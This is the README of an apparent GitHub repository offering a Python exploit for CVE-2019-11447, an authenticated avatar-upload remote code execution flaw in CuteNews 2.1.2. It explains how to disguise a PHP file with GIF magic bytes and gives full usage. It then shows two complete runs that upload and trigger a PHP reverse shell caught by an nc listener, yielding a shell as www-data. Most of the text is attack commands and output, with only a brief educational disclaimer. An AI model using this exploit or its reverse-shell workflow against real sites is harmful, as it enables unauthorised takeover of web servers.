/CVE-2019-11447_CuteNews-AvatarUploadRCE

Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)

Primary LanguagePython

CVE-2019-11447 Exploit/PoC - CuteNews 2.1.2 Avatar upload RCE (Authenticated)

Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)

Exploit Links:

Expected outcome: Login/Register an account, craft user selected PHP file with .gif magic bytes, uploads the file as an avatar and trigger it to achieve Remote Code Execution.

Intended only for educational and testing in corporate environments.

This Exploit was tested on Python 3.8.6

Usage

cfx:  ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]

CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX

optional arguments:
  -h, --help            show this help message and exit
  -l URL, --url URL     CuteNews URL (Example: http://127.0.0.1)
  -u USERNAME, --username USERNAME
                        Username to Login/Register
  -p PASSWORD, --password PASSWORD
                        Password to Login/Register
  -e EMAIL, --email EMAIL
                        Email to Login/Register

Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticon.net
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y

User Inputs :

This exploit expects four arguments to run initially :

  • -l : CuteNews URL
  • -u : Username required to Login/Register
  • -p : Password required to Login/Register
  • -e : Email required to Login/Register

Additional required user inputs:

  • Select your PHP file -> Here the user has to specify the PHP file to be uploaded, it can be any PHP file Example: PHP info, PHP reverse shell. If the PHP file is located in the same directory as of the exploits then the user can just specify the file name:

Example: [^] Select your PHP file -> rev.php

Orelse, user need to specify the location of PHP file:

Example: [^] Select your PHP file -> ~/Downloads/rev.php

  • Press y/n to trigger reverse shell -> Here if the user has uploaded an PHP reverse shell, he/she has the choice whether to trigger the reverse shell using y/n.

Either way the exploit is designed to print out the uploaded file location for further use.

Exploit Execution

  • Scenario 1 > Login with existing credentials and getting a reverse shell:
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime    tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
  • Scenario 2 > Registering new user and getting a reverse shell:
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticons.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime   tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit

Reference